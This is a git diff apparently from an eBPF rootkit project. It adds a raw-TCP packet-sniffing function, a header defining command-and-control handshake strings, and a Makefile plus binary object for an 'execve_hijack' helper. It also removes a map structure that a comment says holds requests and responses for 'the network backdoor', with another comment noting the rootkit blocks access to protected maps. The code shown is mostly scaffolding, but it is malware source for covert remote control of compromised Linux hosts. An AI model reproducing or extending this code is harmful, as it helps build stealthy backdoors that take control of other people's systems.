diff --git a/src/client/lib/RawTCP.h b/src/client/lib/RawTCP.h index 30e7177..2ee831b 100644 --- a/src/client/lib/RawTCP.h +++ b/src/client/lib/RawTCP.h @@ -31,5 +31,6 @@ int rawsocket_send(packet_t packet); packet_t rawsocket_sniff(); +packet_t rawsocket_sniff_pattern(char* payload_pattern); #endif \ No newline at end of file diff --git a/src/client/lib/libRawTCP_Lib.a b/src/client/lib/libRawTCP_Lib.a index 636ade3..8bbefb9 100644 Binary files a/src/client/lib/libRawTCP_Lib.a and b/src/client/lib/libRawTCP_Lib.a differ diff --git a/src/common/map_prot.h b/src/common/map_prot.h index 5f158d7..e9f92c9 100644 --- a/src/common/map_prot.h +++ b/src/common/map_prot.h @@ -11,19 +11,4 @@ /*PROTECTED MAPS*/ //Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted -//Execution hijacking, holder of requesting/response data sent from/to the network backdoor -#define EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN 256 -#define EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN 256 -struct exec_hijack_data{ //Map value - char req_buf[EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN]; - char res_buf[EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN]; -}; - -struct exec_prot_hijack{ //Map - __uint(type, BPF_MAP_TYPE_ARRAY); - __uint(max_entries, 1); - __type(key, __u32); //just 1 entry allowed - __type(value, struct exec_hijack_data); -} exec_hijack SEC(".maps"); - #endif \ No newline at end of file diff --git a/src/ebpf/include/packet/c&c/c&c.h b/src/ebpf/include/packet/c&c/c&c.h new file mode 100644 index 0000000..7fbec6b --- /dev/null +++ b/src/ebpf/include/packet/c&c/c&c.h @@ -0,0 +1,10 @@ +#ifndef __BPF_CC_H +#define __BPF_CC_H + +#define CC_PROT_SYN "CC_SYN" +#define CC_PROT_ACK "CC_ACK" +#define CC_PROT_SYN_ACK "CC_SYN_ACK" +#define CC_PROT_SEPARATOR "#" + + +#endif \ No newline at end of file diff --git a/src/helpers/Makefile b/src/helpers/Makefile new file mode 100644 index 0000000..6aade0b --- /dev/null +++ b/src/helpers/Makefile @@ -0,0 +1,16 @@ +CC = gcc +HEADERS = lib/RawTCP.h +EXTRA_CFLAGS= -I$(PWD)/lib + +default: + make execve_hijack + +execve_hijack.o: execve_hijack.c $(HEADERS) + gcc -c execve_hijack.c + +execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a + gcc -lm -o execve_hijack execve_hijack.o -L. lib/libRawTCP_Lib.a + +clean: + -rm -f execve_hijack.o + -rm -f execve_hijack \ No newline at end of file diff --git a/src/helpers/execve_hijack.o b/src/helpers/execve_hijack.o new file mode 100644 index 0000000..2c65049 Binary files /dev/null and b/src/helpers/execve_hijack.o differ diff --git a/src/helpers/lib/RawTCP.h b/src/helpers/lib/RawTCP.h new file mode 100644 index 0000000..2ee831b --- /dev/null +++ b/src/helpers/lib/RawTCP.h @@ -0,0 +1,36 @@ +#ifndef HEADER_RAWTCP_LIB +#define HEADER_RAWTCP_LIB + +#include + +//Packet_t structure +typedef struct packet_t{ + struct iphdr *ipheader; + struct tcphdr *tcpheader; + char *payload; + int payload_length; + char* packet; +}packet_t; + +//PacketForger headers +packet_t build_standard_packet( + u_int16_t source_port, + u_int16_t destination_port, + const char* source_ip_address, + const char* destination_ip_address, + u_int32_t packet_length, + char* payload + ); + +int packet_destroy(packet_t packet); + +int set_TCP_flags(packet_t packet, int hex_flags); + +//SocketManager headers +int rawsocket_send(packet_t packet); + +packet_t rawsocket_sniff(); + +packet_t rawsocket_sniff_pattern(char* payload_pattern); + +#endif \ No newline at end of file diff --git a/src/helpers/lib/libRawTCP_Lib.a b/src/helpers/lib/libRawTCP_Lib.a new file mode 100644 index 0000000..8bbefb9 Binary files /dev/null and b/src/helpers/lib/libRawTCP_Lib.a differ